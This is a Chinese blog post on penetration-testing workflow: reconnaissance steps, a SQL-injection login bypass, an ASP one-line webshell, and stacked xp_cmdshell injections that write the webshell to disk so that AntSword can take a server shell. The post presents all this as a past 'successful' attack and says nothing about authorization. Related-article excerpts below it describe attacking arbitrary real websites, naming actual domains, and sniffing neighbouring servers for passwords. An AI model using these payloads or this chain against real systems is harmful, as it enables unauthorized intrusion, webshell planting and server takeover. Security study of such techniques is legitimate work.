渗透过程

最新推荐文章于 2024-04-09 11:31:41 发布
最新推荐文章于 2024-04-09 11:31:41 发布
阅读量234 收藏 2
点赞数 2
分类专栏: 安全 漏洞挖掘 文章标签: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomyyyyyy/article/details/95664847
版权

渗透流程

信息收集

1.IP信息

17CE

看是否存在cdn

存在的话,查找真实ip

  • 从国外去访问,查看ip信息
  • 去掉www,然后查看ip信息

2.旁站信息

3.C段信息

4.子域名信息

  • layer子域名挖掘机
  • subdomain

5.端口信息

  • nmap
  • portscan

6.网站目录信息

  • dirsearch
  • dirb

目的是扩大攻击面,寻找防护薄弱点和可利用信息

寻找可能存在漏洞的地方

  • 登陆界面 可能存在sql注入,可以先使用admin’ or 1=1 --+ 之类的语句尝试绕过

  • 搜索界面 可能存在sql注入和存储型和DOM型xss等

  • 上传界面 可以上传一些木马之类东西:

    eg:上传一句话木马,然后使用中国蚁剑去连接(中国菜刀没有中国蚁剑好用!!)

  • 涉及密码或者其它敏感信息的地方 可以进行抓包分析,查看请求包和响应包,看一下有没有什么可以利用的信息,或者有可以修改的参数之类的东西,如果有进行修改,理解每个参数的意义和变化

一次成功的经验

收集信息发现子域名信息,找到一个可以利用的ip,进行端口扫描和网站目录爆破,发现后台管理界面,尝试万能密码进行绕过,成功,里面没有什么可以利用的信息,然后寻找上传接口,然后发现可以从登陆界面上传文件,

一句话木马:

<%execute(request("kxc"))%>

mysql开启存储过程

exec master..xp_cmdshell

echo中使用^转义特殊字符

ss' ;exec master..xp_cmdshell "echo dfvdf > D:\\KEFU\\a.asp"; --+

定义一个变量,然后将变量输入到文件中

sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:\KEFU\1.asp' exec master..xp_cmdshell @cmd;--+

然后使用中国蚁剑连接,可以获得服务器shell

参考链接

参考

tomyyyyy
关注
专栏目录
C段渗透原理
08-29
这里我告诉大家..比如在:127.127.127.4 这个IP上面有一个网站 127.4 这个服务器上面有网站我们可以想想..他是一个非常大的站几乎没什么漏洞!但是在他同C段 127.127.127.1~127.127.127.255 这 1~255 上面也有服务器而且也有网站并且存在漏洞,那么我们就可以来渗透 1~255任何一个站 之后提权来嗅探得到127.4 这台服务器的密码 甚至3389连接的密码后台登录的密码 如果运气好会得到很多的密码…(这里大家又看见了提权这个两个字眼这下大家知道了提权的重要性了吧!)
渗透过程文章
06-21
非常不错的文章~有需要的可以看看.介绍了一些非常有意思的事情。整个过程比较曲折
渗透过程
weixin_34174132的博客
01-13 1446
渗透测试的过程    大家好,我是一名网络安全的爱好者,其实现在也是一名小白,学习网络安全的时间没有多长时间,如果技术上或者有些地方不够全面希望大佬勿喷,我也是在我的理解的范围内给大家讲解的在我眼里的渗透测试的过程,此篇文章主要讲解是针对于0基础的同学或者对于渗透测试感兴趣的同学,对于网络安全的技术爱好者。   什么是渗透测试?百度上的https://baijiahao.baidu.com/s...
绝境渗透之你们想看的从0到100的渗透过程
dfdhxb995397的博客
07-12 153
原文来自:https://bbs.ichunqiu.com/thread-42556-1-1.html 本次渗透为合作学校展开的渗透测试,比较艰难。途中所涉及的IP 均处理过。如有漏码请私信与我告知。 项目:www.*.edu.tw 主站信息:PHP脚本 服务器:Linux 简述:此次目标的难度性比较大,有2网段: 信息如下: 193.*.117.1/24 193....
渗透测试之流程简述
2301_77732591的博客
04-27 2051
渗透测试分为和黑盒测试,我们只知道该网站的URLNmap:一款功能强大的网络扫描和主机检测工具,可以用于收集信息、枚举、漏洞探测和安全扫描。Wireshark:一款抓包和分析网络流量的工具,可以用于监控和调试网络通信。Goby:一款新型的漏洞扫描平台,可以快速发现并利用各种漏洞,还可以联动其他工具如Xray和MSF。22——>ssh弱口令80——>HTTP服务873——>rsync 未授权访问漏洞3306——>mysql弱口令6379——>redis未授权访问漏洞。
渗透的一般过程(转载)
weixin_42433054的博客
08-25 684
1、拿到一个网站,先做什么 最重要的:是拿到网站的授权扫描,没有对方的授权,千万不能扫描。 1】获取域名的whois信息,获取注册者姓名电话,丢社工库里面看看有没有泄露密码,然后尝试用泄露的密码进行登录后台,用邮箱做关键词丢进搜索引擎,利用搜索到的关联信息找出其他邮箱进而得到常用社交账号。社工找出社交账号,里面或许会找到管理员设置密码的习惯。利用已有信息生成字典。 2】查询...
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
面向渗透过程的电力监控系统网络安全防护.pdf
09-19
面向渗透过程的电力监控系统网络安全防护.pdf
渗透过程cms的指纹识别课件
07-10
渗透过程cms的指纹识别课件
渗透教程渗透教程
08-18
今天我们还是讲渗透、 只不过用到的工具不同 御剑孤独1.5+明小子 我是傻瓜先生 自从上次做了个 菜刀 +椰树的教程 我的站就被两个孙子给黑了 我实在看不下去。 我放出教程是为了让你们学习。你们却来搞我。 不多说了 教程开始 OK。还是一样 随便找个网站 http://www.zztiancaiedu.com/ http://news.jiaotou.org/ http://gz.ewangpai.com/ 就上次的这些站 需要等待一下 这里需要点时间我就暂停一下 OK,扫描好了 竟然没猜到 换一个 好吧再换一个 这里我们需要 MD5解密 OK。进后台了 可以邪恶了。 会的 可以传小马 代替数据库然后穿大马。 我这里就不详细讲解了。 欢迎各位来和我交流讨论 也希望有大牛来啊
PTES渗透测试执行标准
galaxy96的博客
11-25 9396
渗透测试注意事项: 1:不要进行恶意攻击 2:不要做傻事 3:在没有获得书面授权时,不要攻击任何目标 4:考虑你的行为将会带来的后果 5:如果你干了非法的是,天网恢恢疏而不漏 渗透测试执行标准http://www.pentest-standard.org/ 1:前期交互阶段 在前期交互(Pre-Engagement Interaction)阶段,渗透测试团队与客户组
渗透步骤概述
nielilijy的专栏
08-14 683
1、攻击前的信息收集 1、互联网方式获取:网址、ip、服务器所在地址等 2、获取真实ip之后,根据ip开始获取服务器信息:操作系统,开放端口、服务等 3、根据获得的服务器信息,进行漏洞扫描,从而决定后面的攻击策略 2、攻击手段 1、社会工程学方式 1、目的:获取客户账号密码 实现:发送钓鱼邮件,说要改账号之类的,然后给一个链接,界面跟某某网...
渗透测试的8个步骤(超详细),小白必看!
2301_77472496的博客
11-08 1690
渗透测试:以安全为基本原则,通过攻击者以及防御者的角度去分析目标所存在的安全隐患以及脆弱性,以保护系统安全为最终目标。
渗透攻击必用命令与步骤
冷血书生的专栏
06-07 1445
假设想攻击的主机IP是:61.139.1.79同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆第一步:tracert 61.139.1.1C:/WIN2000/system32>tracert 61.139.1.1Tracing route to HACK-4FJ7EARC [61.139.1.1]over a maximum of 30 hops:
ARP监听渗透内网的方法
weixin_30429201的博客
02-27 140
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已通过漏洞获得权限的主机IP是:61.139.1.88并可以3389登陆。第一步:tracert 61.139.1.1C:/WIN2000/system32>tracert 61.139.1.1Tracing route to HACK-4FJ7EARC [61.139.1.1]over a maximum of 30 hops...
C段渗透攻击必看的技术知识
weixin_30318645的博客
11-25 378
假设想攻击的主机IP是:61.139.1.79 同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert 61.139.1.1 C:\WIN2000\system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hop...
渗透测试流程-信息收集-C段+旁站
最新发布
#7的博客
04-09 1128
主要介绍了旁站、C段信息收集
菜刀渗透
刘思成的博客
03-27 2556
快速搭建discuz论坛 使用kali下BurpSuite对discuz后台注入php木马 使用Cknife“菜刀”.上传webshell木马到网站 使用Webshell查看mysql数据库密码并盗取数据库 快速搭建discuz论坛 攻击思路 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞 2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用...
"phpmailer漏洞UDF提权攻击渗透过程详解
首先,渗透过程开始于寻找靶机的IP地址。通过漏洞扫描工具如nmap和srap-scan来发现靶机开放的端口以及相关服务。通过这些信息,渗透者可以进一步探索靶机的漏洞和弱点。 在得知靶机开放了SSH和HTTP(端口80)之后,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值